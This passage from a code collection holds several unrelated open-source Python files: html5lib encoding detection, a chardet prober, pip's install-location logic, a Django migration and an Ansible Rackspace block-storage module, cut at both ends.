source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
"""
if not _utils.supports_lone_surrogates:
# Such platforms will have already checked for such
# surrogate errors, so no need to do this checking.
self.reportCharacterErrors = None
elif len("\U0010FFFF") == 1:
self.reportCharacterErrors = self.characterErrorsUCS4
else:
self.reportCharacterErrors = self.characterErrorsUCS2
# List of where new lines occur
self.newLines = [0]
self.charEncoding = (lookupEncoding("utf-8"), "certain")
self.dataStream = self.openStream(source)
self.reset()
def reset(self):
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
self.errors = []
# number of (complete) lines in previous chunks
self.prevNumLines = 0
# number of columns in the last line of the previous chunk
self.prevNumCols = 0
# Deal with CR LF and surrogates split over chunk boundaries
self._bufferedCharacter = None
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = StringIO(source)
return stream
def _position(self, offset):
chunk = self.chunk
nLines = chunk.count('\n', 0, offset)
positionLine = self.prevNumLines + nLines
lastLinePos = chunk.rfind('\n', 0, offset)
if lastLinePos == -1:
positionColumn = self.prevNumCols + offset
else:
positionColumn = offset - (lastLinePos + 1)
return (positionLine, positionColumn)
def position(self):
"""Returns (line, col) of the current position in the stream."""
line, col = self._position(self.chunkOffset)
return (line + 1, col)
def char(self):
""" Read one character from the stream or queue if available. Return
EOF when EOF is reached.
"""
# Read a new chunk from the input stream if necessary
if self.chunkOffset >= self.chunkSize:
if not self.readChunk():
return EOF
chunkOffset = self.chunkOffset
char = self.chunk[chunkOffset]
self.chunkOffset = chunkOffset + 1
return char
def readChunk(self, chunkSize=None):
if chunkSize is None:
chunkSize = self._defaultChunkSize
self.prevNumLines, self.prevNumCols = self._position(self.chunkSize)
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
data = self.dataStream.read(chunkSize)
# Deal with CR LF and surrogates broken across chunks
if self._bufferedCharacter:
data = self._bufferedCharacter + data
self._bufferedCharacter = None
elif not data:
# We have no more data, bye-bye stream
return False
if len(data) > 1:
lastv = ord(data[-1])
if lastv == 0x0D or 0xD800 <= lastv <= 0xDBFF:
self._bufferedCharacter = data[-1]
data = data[:-1]
if self.reportCharacterErrors:
self.reportCharacterErrors(data)
# Replace invalid characters
data = data.replace("\r\n", "\n")
data = data.replace("\r", "\n")
self.chunk = data
self.chunkSize = len(data)
return True
def characterErrorsUCS4(self, data):
for _ in range(len(invalid_unicode_re.findall(data))):
self.errors.append("invalid-codepoint")
def characterErrorsUCS2(self, data):
# Someone picked the wrong compile option
# You lose
skip = False
for match in invalid_unicode_re.finditer(data):
if skip:
continue
codepoint = ord(match.group())
pos = match.start()
# Pretty sure there should be endianness issues here
if _utils.isSurrogatePair(data[pos:pos + 2]):
# We have a surrogate pair!
char_val = _utils.surrogatePairToCodepoint(data[pos:pos + 2])
if char_val in non_bmp_invalid_codepoints:
self.errors.append("invalid-codepoint")
skip = True
elif (codepoint >= 0xD800 and codepoint <= 0xDFFF and
pos == len(data) - 1):
self.errors.append("invalid-codepoint")
else:
skip = False
self.errors.append("invalid-codepoint")
def charsUntil(self, characters, opposite=False):
""" Returns a string of characters from the stream up to but not
including any character in 'characters' or EOF. 'characters' must be
a container that supports the 'in' method and iteration over its
characters.
"""
# Use a cache of regexps to find the required characters
try:
chars = charsUntilRegEx[(characters, opposite)]
except KeyError:
if __debug__:
for c in characters:
assert(ord(c) < 128)
regex = "".join(["\\x%02x" % ord(c) for c in characters])
if not opposite:
regex = "^%s" % regex
chars = charsUntilRegEx[(characters, opposite)] = re.compile("[%s]+" % regex)
rv = []
while True:
# Find the longest matching prefix
m = chars.match(self.chunk, self.chunkOffset)
if m is None:
# If nothing matched, and it wasn't because we ran out of chunk,
# then stop
if self.chunkOffset != self.chunkSize:
break
else:
end = m.end()
# If not the whole chunk matched, return everything
# up to the part that didn't match
if end != self.chunkSize:
rv.append(self.chunk[self.chunkOffset:end])
self.chunkOffset = end
break
# If the whole remainder of the chunk matched,
# use it all and read the next chunk
rv.append(self.chunk[self.chunkOffset:])
if not self.readChunk():
# Reached EOF
break
r = "".join(rv)
return r
def unget(self, char):
# Only one character is allowed to be ungotten at once - it must
# be consumed again before any further call to unget
if char is not None:
if self.chunkOffset == 0:
# unget is called quite rarely, so it's a good idea to do
# more work here if it saves a bit of work in the frequently
# called char and charsUntil.
# So, just prepend the ungotten character onto the current
# chunk:
self.chunk = char + self.chunk
self.chunkSize += 1
else:
self.chunkOffset -= 1
assert self.chunk[self.chunkOffset] == char
class HTMLBinaryInputStream(HTMLUnicodeInputStream):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
def __init__(self, source, override_encoding=None, transport_encoding=None,
same_origin_parent_encoding=None, likely_encoding=None,
default_encoding="windows-1252", useChardet=True):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
"""
# Raw Stream - for unicode objects this will encode to utf-8 and set
# self.charEncoding as appropriate
self.rawStream = self.openStream(source)
HTMLUnicodeInputStream.__init__(self, self.rawStream)
# Encoding Information
# Number of bytes to use when looking for a meta element with
# encoding information
self.numBytesMeta = 1024
# Number of bytes to use when using detecting encoding using chardet
self.numBytesChardet = 100
# Things from args
self.override_encoding = override_encoding
self.transport_encoding = transport_encoding
self.same_origin_parent_encoding = same_origin_parent_encoding
self.likely_encoding = likely_encoding
self.default_encoding = default_encoding
# Determine encoding
self.charEncoding = self.determineEncoding(useChardet)
assert self.charEncoding[0] is not None
# Call superclass
self.reset()
def reset(self):
self.dataStream = self.charEncoding[0].codec_info.streamreader(self.rawStream, 'replace')
HTMLUnicodeInputStream.reset(self)
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = BytesIO(source)
try:
stream.seek(stream.tell())
except: # pylint:disable=bare-except
stream = BufferedStream(stream)
return stream
def determineEncoding(self, chardet=True):
# BOMs take precedence over everything
# This will also read past the BOM if present
charEncoding = self.detectBOM(), "certain"
if charEncoding[0] is not None:
return charEncoding
# If we've been overriden, we've been overriden
charEncoding = lookupEncoding(self.override_encoding), "certain"
if charEncoding[0] is not None:
return charEncoding
# Now check the transport layer
charEncoding = lookupEncoding(self.transport_encoding), "certain"
if charEncoding[0] is not None:
return charEncoding
# Look for meta elements with encoding information
charEncoding = self.detectEncodingMeta(), "tentative"
if charEncoding[0] is not None:
return charEncoding
# Parent document encoding
charEncoding = lookupEncoding(self.same_origin_parent_encoding), "tentative"
if charEncoding[0] is not None and not charEncoding[0].name.startswith("utf-16"):
return charEncoding
# "likely" encoding
charEncoding = lookupEncoding(self.likely_encoding), "tentative"
if charEncoding[0] is not None:
return charEncoding
# Guess with chardet, if available
if chardet:
try:
from chardet.universaldetector import UniversalDetector
except ImportError:
pass
else:
buffers = []
detector = UniversalDetector()
while not detector.done:
buffer = self.rawStream.read(self.numBytesChardet)
assert isinstance(buffer, bytes)
if not buffer:
break
buffers.append(buffer)
detector.feed(buffer)
detector.close()
encoding = lookupEncoding(detector.result['encoding'])
self.rawStream.seek(0)
if encoding is not None:
return encoding, "tentative"
# Try the default encoding
charEncoding = lookupEncoding(self.default_encoding), "tentative"
if charEncoding[0] is not None:
return charEncoding
# Fallback to html5lib's default if even that hasn't worked
return lookupEncoding("windows-1252"), "tentative"
def changeEncoding(self, newEncoding):
assert self.charEncoding[1] != "certain"
newEncoding = lookupEncoding(newEncoding)
if newEncoding is None:
return
if newEncoding.name in ("utf-16be", "utf-16le"):
newEncoding = lookupEncoding("utf-8")
assert newEncoding is not None
elif newEncoding == self.charEncoding[0]:
self.charEncoding = (self.charEncoding[0], "certain")
else:
self.rawStream.seek(0)
self.charEncoding = (newEncoding, "certain")
self.reset()
raise ReparseException("Encoding changed from %s to %s" % (self.charEncoding[0], newEncoding))
def detectBOM(self):
"""Attempts to detect at BOM at the start of the stream. If
an encoding can be determined from the BOM return the name of the
encoding otherwise return None"""
bomDict = {
codecs.BOM_UTF8: 'utf-8',
codecs.BOM_UTF16_LE: 'utf-16le', codecs.BOM_UTF16_BE: 'utf-16be',
codecs.BOM_UTF32_LE: 'utf-32le', codecs.BOM_UTF32_BE: 'utf-32be'
}
# Go to beginning of file and read in 4 bytes
string = self.rawStream.read(4)
assert isinstance(string, bytes)
# Try detecting the BOM using bytes from the string
encoding = bomDict.get(string[:3]) # UTF-8
seek = 3
if not encoding:
# Need to detect UTF-32 before UTF-16
encoding = bomDict.get(string) # UTF-32
seek = 4
if not encoding:
encoding = bomDict.get(string[:2]) # UTF-16
seek = 2
# Set the read position past the BOM if one was found, otherwise
# set it to the start of the stream
if encoding:
self.rawStream.seek(seek)
return lookupEncoding(encoding)
else:
self.rawStream.seek(0)
return None
def detectEncodingMeta(self):
"""Report the encoding declared by the meta element
"""
buffer = self.rawStream.read(self.numBytesMeta)
assert isinstance(buffer, bytes)
parser = EncodingParser(buffer)
self.rawStream.seek(0)
encoding = parser.getEncoding()
if encoding is not None and encoding.name in ("utf-16be", "utf-16le"):
encoding = lookupEncoding("utf-8")
return encoding
class EncodingBytes(bytes):
"""String-like object with an associated position and various extra methods
If the position is ever greater than the string length then an exception is
raised"""
def __new__(self, value):
assert isinstance(value, bytes)
return bytes.__new__(self, value.lower())
def __init__(self, value):
# pylint:disable=unused-argument
self._position = -1
def __iter__(self):
return self
def __next__(self):
p = self._position = self._position + 1
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
return self[p:p + 1]
def next(self):
# Py2 compat
return self.__next__()
def previous(self):
p = self._position
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
self._position = p = p - 1
return self[p:p + 1]
def setPosition(self, position):
if self._position >= len(self):
raise StopIteration
self._position = position
def getPosition(self):
if self._position >= len(self):
raise StopIteration
if self._position >= 0:
return self._position
else:
return None
position = property(getPosition, setPosition)
def getCurrentByte(self):
return self[self.position:self.position + 1]
currentByte = property(getCurrentByte)
def skip(self, chars=spaceCharactersBytes):
"""Skip past a list of characters"""
p = self.position # use property for the error-checking
while p < len(self):
c = self[p:p + 1]
if c not in chars:
self._position = p
return c
p += 1
self._position = p
return None
def skipUntil(self, chars):
p = self.position
while p < len(self):
c = self[p:p + 1]
if c in chars:
self._position = p
return c
p += 1
self._position = p
return None
def matchBytes(self, bytes):
"""Look for a sequence of bytes at the start of a string. If the bytes
are found return True and advance the position to the byte after the
match. Otherwise return False and leave the position alone"""
p = self.position
data = self[p:p + len(bytes)]
rv = data.startswith(bytes)
if rv:
self.position += len(bytes)
return rv
def jumpTo(self, bytes):
"""Look for the next sequence of bytes matching a given sequence. If
a match is found advance the position to the last byte of the match"""
newPosition = self[self.position:].find(bytes)
if newPosition > -1:
# XXX: This is ugly, but I can't see a nicer way to fix this.
if self._position == -1:
self._position = 0
self._position += (newPosition + len(bytes) - 1)
return True
else:
raise StopIteration
class EncodingParser(object):
"""Mini parser for detecting character encoding from meta elements"""
def __init__(self, data):
"""string - the data to work on for encoding detection"""
self.data = EncodingBytes(data)
self.encoding = None
def getEncoding(self):
methodDispatch = (
(b"<!--", self.handleComment),
(b"<meta", self.handleMeta),
(b"</", self.handlePossibleEndTag),
(b"<!", self.handleOther),
(b"<?", self.handleOther),
(b"<", self.handlePossibleStartTag))
for _ in self.data:
keepParsing = True
for key, method in methodDispatch:
if self.data.matchBytes(key):
try:
keepParsing = method()
break
except StopIteration:
keepParsing = False
break
if not keepParsing:
break
return self.encoding
def handleComment(self):
"""Skip over comments"""
return self.data.jumpTo(b"-->")
def handleMeta(self):
if self.data.currentByte not in spaceCharactersBytes:
# if we have <meta not followed by a space so just keep going
return True
# We have a valid meta element we want to search for attributes
hasPragma = False
pendingEncoding = None
while True:
# Try to find the next attribute after the current position
attr = self.getAttribute()
if attr is None:
return True
else:
if attr[0] == b"http-equiv":
hasPragma = attr[1] == b"content-type"
if hasPragma and pendingEncoding is not None:
self.encoding = pendingEncoding
return False
elif attr[0] == b"charset":
tentativeEncoding = attr[1]
codec = lookupEncoding(tentativeEncoding)
if codec is not None:
self.encoding = codec
return False
elif attr[0] == b"content":
contentParser = ContentAttrParser(EncodingBytes(attr[1]))
tentativeEncoding = contentParser.parse()
if tentativeEncoding is not None:
codec = lookupEncoding(tentativeEncoding)
if codec is not None:
if hasPragma:
self.encoding = codec
return False
else:
pendingEncoding = codec
def handlePossibleStartTag(self):
return self.handlePossibleTag(False)
def handlePossibleEndTag(self):
next(self.data)
return self.handlePossibleTag(True)
def handlePossibleTag(self, endTag):
data = self.data
if data.currentByte not in asciiLettersBytes:
# If the next byte is not an ascii letter either ignore this
# fragment (possible start tag case) or treat it according to
# handleOther
if endTag:
data.previous()
self.handleOther()
return True
c = data.skipUntil(spacesAngleBrackets)
if c == b"<":
# return to the first step in the overall "two step" algorithm
# reprocessing the < byte
data.previous()
else:
# Read all attributes
attr = self.getAttribute()
while attr is not None:
attr = self.getAttribute()
return True
def handleOther(self):
return self.data.jumpTo(b">")
def getAttribute(self):
"""Return a name,value pair for the next attribute in the stream,
if one is found, or None"""
data = self.data
# Step 1 (skip chars)
c = data.skip(spaceCharactersBytes | frozenset([b"/"]))
assert c is None or len(c) == 1
# Step 2
if c in (b">", None):
return None
# Step 3
attrName = []
attrValue = []
# Step 4 attribute name
while True:
if c == b"=" and attrName:
break
elif c in spaceCharactersBytes:
# Step 6!
c = data.skip()
break
elif c in (b"/", b">"):
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrName.append(c.lower())
elif c is None:
return None
else:
attrName.append(c)
# Step 5
c = next(data)
# Step 7
if c != b"=":
data.previous()
return b"".join(attrName), b""
# Step 8
next(data)
# Step 9
c = data.skip()
# Step 10
if c in (b"'", b'"'):
# 10.1
quoteChar = c
while True:
# 10.2
c = next(data)
# 10.3
if c == quoteChar:
next(data)
return b"".join(attrName), b"".join(attrValue)
# 10.4
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
# 10.5
else:
attrValue.append(c)
elif c == b">":
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
# Step 11
while True:
c = next(data)
if c in spacesAngleBrackets:
return b"".join(attrName), b"".join(attrValue)
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
class ContentAttrParser(object):
def __init__(self, data):
assert isinstance(data, bytes)
self.data = data
def parse(self):
try:
# Check if the attr name is charset
# otherwise return
self.data.jumpTo(b"charset")
self.data.position += 1
self.data.skip()
if not self.data.currentByte == b"=":
# If there is no = sign keep looking for attrs
return None
self.data.position += 1
self.data.skip()
# Look for an encoding between matching quote marks
if self.data.currentByte in (b'"', b"'"):
quoteMark = self.data.currentByte
self.data.position += 1
oldPosition = self.data.position
if self.data.jumpTo(quoteMark):
return self.data[oldPosition:self.data.position]
else:
return None
else:
# Unquoted value
oldPosition = self.data.position
try:
self.data.skipUntil(spaceCharactersBytes)
return self.data[oldPosition:self.data.position]
except StopIteration:
# Return the whole remaining value
return self.data[oldPosition:]
except StopIteration:
return None
def lookupEncoding(encoding):
"""Return the python codec name corresponding to an encoding or None if the
string doesn't correspond to a valid encoding."""
if isinstance(encoding, binary_type):
try:
encoding = encoding.decode("ascii")
except UnicodeDecodeError:
return None
if encoding is not None:
try:
return webencodings.lookup(encoding)
except AttributeError:
return None
else:
return None
| mit |
sdopoku/flask-blog | env/lib/python2.7/site-packages/pip/_vendor/requests/packages/charade/sbcharsetprober.py | 2927 | 4793 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
from .compat import wrap_ord
SAMPLE_SIZE = 64
SB_ENOUGH_REL_THRESHOLD = 1024
POSITIVE_SHORTCUT_THRESHOLD = 0.95
NEGATIVE_SHORTCUT_THRESHOLD = 0.05
SYMBOL_CAT_ORDER = 250
NUMBER_OF_SEQ_CAT = 4
POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1
#NEGATIVE_CAT = 0
class SingleByteCharSetProber(CharSetProber):
def __init__(self, model, reversed=False, nameProber=None):
CharSetProber.__init__(self)
self._mModel = model
# TRUE if we need to reverse every pair in the model lookup
self._mReversed = reversed
# Optional auxiliary prober for name decision
self._mNameProber = nameProber
self.reset()
def reset(self):
CharSetProber.reset(self)
# char order of last character
self._mLastOrder = 255
self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT
self._mTotalSeqs = 0
self._mTotalChar = 0
# characters that fall in our sampling range
self._mFreqChar = 0
def get_charset_name(self):
if self._mNameProber:
return self._mNameProber.get_charset_name()
else:
return self._mModel['charsetName']
def feed(self, aBuf):
if not self._mModel['keepEnglishLetter']:
aBuf = self.filter_without_english_letters(aBuf)
aLen = len(aBuf)
if not aLen:
return self.get_state()
for c in aBuf:
order = self._mModel['charToOrderMap'][wrap_ord(c)]
if order < SYMBOL_CAT_ORDER:
self._mTotalChar += 1
if order < SAMPLE_SIZE:
self._mFreqChar += 1
if self._mLastOrder < SAMPLE_SIZE:
self._mTotalSeqs += 1
if not self._mReversed:
i = (self._mLastOrder * SAMPLE_SIZE) + order
model = self._mModel['precedenceMatrix'][i]
else: # reverse the order of the letters in the lookup
i = (order * SAMPLE_SIZE) + self._mLastOrder
model = self._mModel['precedenceMatrix'][i]
self._mSeqCounters[model] += 1
self._mLastOrder = order
if self.get_state() == constants.eDetecting:
if self._mTotalSeqs > SB_ENOUGH_REL_THRESHOLD:
cf = self.get_confidence()
if cf > POSITIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, we have a'
'winner\n' %
(self._mModel['charsetName'], cf))
self._mState = constants.eFoundIt
elif cf < NEGATIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, below negative'
'shortcut threshhold %s\n' %
(self._mModel['charsetName'], cf,
NEGATIVE_SHORTCUT_THRESHOLD))
self._mState = constants.eNotMe
return self.get_state()
def get_confidence(self):
r = 0.01
if self._mTotalSeqs > 0:
r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs
/ self._mModel['mTypicalPositiveRatio'])
r = r * self._mFreqChar / self._mTotalChar
if r >= 1.0:
r = 0.99
return r
| gpl-2.0 |
bakkou-badri/dataminingproject | env/lib/python2.7/site-packages/pip/locations.py | 390 | 6202 | """Locations where we look for configs, install stuff, etc"""
import sys
import site
import os
import tempfile
from distutils.command.install import install, SCHEME_KEYS
import getpass
from pip.backwardcompat import get_python_lib, get_path_uid, user_site
import pip.exceptions
DELETE_MARKER_MESSAGE = '''\
This file is placed here by pip to indicate the source was put
here by pip.
Once this package is successfully installed this source code will be
deleted (unless you remove this file).
'''
PIP_DELETE_MARKER_FILENAME = 'pip-delete-this-directory.txt'
def write_delete_marker_file(directory):
"""
Write the pip delete marker file into this directory.
"""
filepath = os.path.join(directory, PIP_DELETE_MARKER_FILENAME)
marker_fp = open(filepath, 'w')
marker_fp.write(DELETE_MARKER_MESSAGE)
marker_fp.close()
def running_under_virtualenv():
"""
Return True if we're running inside a virtualenv, False otherwise.
"""
if hasattr(sys, 'real_prefix'):
return True
elif sys.prefix != getattr(sys, "base_prefix", sys.prefix):
return True
return False
def virtualenv_no_global():
"""
Return True if in a venv and no system site packages.
"""
#this mirrors the logic in virtualenv.py for locating the no-global-site-packages.txt file
site_mod_dir = os.path.dirname(os.path.abspath(site.__file__))
no_global_file = os.path.join(site_mod_dir, 'no-global-site-packages.txt')
if running_under_virtualenv() and os.path.isfile(no_global_file):
return True
def __get_username():
""" Returns the effective username of the current process. """
if sys.platform == 'win32':
return getpass.getuser()
import pwd
return pwd.getpwuid(os.geteuid()).pw_name
def _get_build_prefix():
""" Returns a safe build_prefix """
path = os.path.join(tempfile.gettempdir(), 'pip_build_%s' %
__get_username())
if sys.platform == 'win32':
""" on windows(tested on 7) temp dirs are isolated """
return path
try:
os.mkdir(path)
write_delete_marker_file(path)
except OSError:
file_uid = None
try:
# raises OSError for symlinks
# https://github.com/pypa/pip/pull/935#discussion_r5307003
file_uid = get_path_uid(path)
except OSError:
file_uid = None
if file_uid != os.geteuid():
msg = "The temporary folder for building (%s) is either not owned by you, or is a symlink." \
% path
print (msg)
print("pip will not work until the temporary folder is " + \
"either deleted or is a real directory owned by your user account.")
raise pip.exceptions.InstallationError(msg)
return path
if running_under_virtualenv():
build_prefix = os.path.join(sys.prefix, 'build')
src_prefix = os.path.join(sys.prefix, 'src')
else:
# Note: intentionally NOT using mkdtemp
# See https://github.com/pypa/pip/issues/906 for plan to move to mkdtemp
build_prefix = _get_build_prefix()
## FIXME: keep src in cwd for now (it is not a temporary folder)
try:
src_prefix = os.path.join(os.getcwd(), 'src')
except OSError:
# In case the current working directory has been renamed or deleted
sys.exit("The folder you are executing pip from can no longer be found.")
# under Mac OS X + virtualenv sys.prefix is not properly resolved
# it is something like /path/to/python/bin/..
# Note: using realpath due to tmp dirs on OSX being symlinks
build_prefix = os.path.abspath(os.path.realpath(build_prefix))
src_prefix = os.path.abspath(src_prefix)
# FIXME doesn't account for venv linked to global site-packages
site_packages = get_python_lib()
user_dir = os.path.expanduser('~')
if sys.platform == 'win32':
bin_py = os.path.join(sys.prefix, 'Scripts')
bin_user = os.path.join(user_site, 'Scripts') if user_site else None
# buildout uses 'bin' on Windows too?
if not os.path.exists(bin_py):
bin_py = os.path.join(sys.prefix, 'bin')
bin_user = os.path.join(user_site, 'bin') if user_site else None
default_storage_dir = os.path.join(user_dir, 'pip')
default_config_file = os.path.join(default_storage_dir, 'pip.ini')
default_log_file = os.path.join(default_storage_dir, 'pip.log')
else:
bin_py = os.path.join(sys.prefix, 'bin')
bin_user = os.path.join(user_site, 'bin') if user_site else None
default_storage_dir = os.path.join(user_dir, '.pip')
default_config_file = os.path.join(default_storage_dir, 'pip.conf')
default_log_file = os.path.join(default_storage_dir, 'pip.log')
# Forcing to use /usr/local/bin for standard Mac OS X framework installs
# Also log to ~/Library/Logs/ for use with the Console.app log viewer
if sys.platform[:6] == 'darwin' and sys.prefix[:16] == '/System/Library/':
bin_py = '/usr/local/bin'
default_log_file = os.path.join(user_dir, 'Library/Logs/pip.log')
def distutils_scheme(dist_name, user=False, home=None, root=None):
"""
Return a distutils install scheme
"""
from distutils.dist import Distribution
scheme = {}
d = Distribution({'name': dist_name})
d.parse_config_files()
i = d.get_command_obj('install', create=True)
# NOTE: setting user or home has the side-effect of creating the home dir or
# user base for installations during finalize_options()
# ideally, we'd prefer a scheme class that has no side-effects.
i.user = user or i.user
i.home = home or i.home
i.root = root or i.root
i.finalize_options()
for key in SCHEME_KEYS:
scheme[key] = getattr(i, 'install_'+key)
if running_under_virtualenv():
scheme['headers'] = os.path.join(sys.prefix,
'include',
'site',
'python' + sys.version[:3],
dist_name)
if root is not None:
scheme["headers"] = os.path.join(
root,
os.path.abspath(scheme["headers"])[1:],
)
return scheme
| gpl-2.0 |
swcarpentry/amy | amy/workshops/migrations/0079_eventsubmission.py | 3 | 1490 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-13 11:14
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('workshops', '0078_auto_20160212_1257'),
]
operations = [
migrations.CreateModel(
name='EventSubmission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('active', models.BooleanField(default=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('url', models.URLField(verbose_name="Link to the workshop's website")),
('contact_name', models.CharField(max_length=100, verbose_name='Your name')),
('contact_email', models.EmailField(help_text='We may need to contact you regarding workshop details.', max_length=254, verbose_name='Your email')),
('self_organized', models.BooleanField(default=False, verbose_name='Was the workshop self-organized?')),
('notes', models.TextField(blank=True, default='')),
('assigned_to', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
| mit |
randynobx/ansible | lib/ansible/modules/cloud/rackspace/rax_cbs.py | 70 | 7282 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: rax_cbs
short_description: Manipulate Rackspace Cloud Block Storage Volumes
description:
- Manipulate Rackspace Cloud Block Storage Volumes
version_added: 1.6
options:
description:
description:
- Description to give the volume being created
default: null
image:
description:
- image to use for bootable volumes. Can be an C(id), C(human_id) or
C(name). This option requires C(pyrax>=1.9.3)
default: null
version_added: 1.9
meta:
description:
- A hash of metadata to associate with the volume
default: null
name:
description:
- Name to give the volume being created
default: null
required: true
size:
description:
- Size of the volume to create in Gigabytes
default: 100
required: true
snapshot_id:
description:
- The id of the snapshot to create the volume from
default: null
state:
description:
- Indicate desired state of the resource
choices:
- present
- absent
default: present
required: true
volume_type:
description:
- Type of the volume being created
choices:
- SATA
- SSD
default: SATA
required: true
wait:
description:
- wait for the volume to be in state 'available' before returning
default: "no"
choices:
- "yes"
- "no"
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
author:
- "Christopher H. Laco (@claco)"
- "Matt Martz (@sivel)"
extends_documentation_fragment: rackspace.openstack
'''
EXAMPLES = '''
- name: Build a Block Storage Volume
gather_facts: False
hosts: local
connection: local
tasks:
- name: Storage volume create request
local_action:
module: rax_cbs
credentials: ~/.raxpub
name: my-volume
description: My Volume
volume_type: SSD
size: 150
region: DFW
wait: yes
state: present
meta:
app: my-cool-app
register: my_volume
'''
from distutils.version import LooseVersion
try:
import pyrax
HAS_PYRAX = True
except ImportError:
HAS_PYRAX = False
def cloud_block_storage(module, state, name, description, meta, size,
snapshot_id, volume_type, wait, wait_timeout,
image):
changed = False
volume = None
instance = {}
cbs = pyrax.cloud_blockstorage
if cbs is None:
module.fail_json(msg='Failed to instantiate client. This '
'typically indicates an invalid region or an '
'incorrectly capitalized region name.')
if image:
# pyrax<1.9.3 did not have support for specifying an image when
# creating a volume which is required for bootable volumes
if LooseVersion(pyrax.version.version) < LooseVersion('1.9.3'):
module.fail_json(msg='Creating a bootable volume requires '
'pyrax>=1.9.3')
image = rax_find_image(module, pyrax, image)
volume = rax_find_volume(module, pyrax, name)
if state == 'present':
if not volume:
kwargs = dict()
if image:
kwargs['image'] = image
try:
volume = cbs.create(name, size=size, volume_type=volume_type,
description=description,
metadata=meta,
snapshot_id=snapshot_id, **kwargs)
changed = True
except Exception as e:
module.fail_json(msg='%s' % e.message)
else:
if wait:
attempts = wait_timeout / 5
pyrax.utils.wait_for_build(volume, interval=5,
attempts=attempts)
volume.get()
instance = rax_to_dict(volume)
result = dict(changed=changed, volume=instance)
if volume.status == 'error':
result['msg'] = '%s failed to build' % volume.id
elif wait and volume.status not in VOLUME_STATUS:
result['msg'] = 'Timeout waiting on %s' % volume.id
if 'msg' in result:
module.fail_json(**result)
else:
module.exit_json(**result)
elif state == 'absent':
if volume:
instance = rax_to_dict(volume)
try:
volume.delete()
changed = True
except Exception as e:
module.fail_json(msg='%s' % e.message)
module.exit_json(changed=changed, volume=instance)
def main():
argument_spec = rax_argument_spec()
argument_spec.update(
dict(
description=dict(type='str'),
image=dict(type='str'),
meta=dict(type='dict', default={}),
name=dict(required=True),
size=dict(type='int', default=100),
snapshot_id=dict(),
state=dict(default='present', choices=['present', 'absent']),
volume_type=dict(choices=['SSD', 'SATA'], default='SATA'),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=300)
)
)
module = AnsibleModule(
argument_spec=argument_spec,
required_together=rax_required_together()
)
if not HAS_PYRAX:
module.fail_json(msg='pyrax is required for this module')
description = module.params.get('description')
image = module.params.get('image')
meta = module.params.get('meta')
name = module.params.get('name')
size = module.params.get('size')
snapshot_id = module.params.get('snapshot_id')
state = module.params.get('state')
volume_type = module.params.get('volume_type')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
setup_rax_module(module, pyrax)
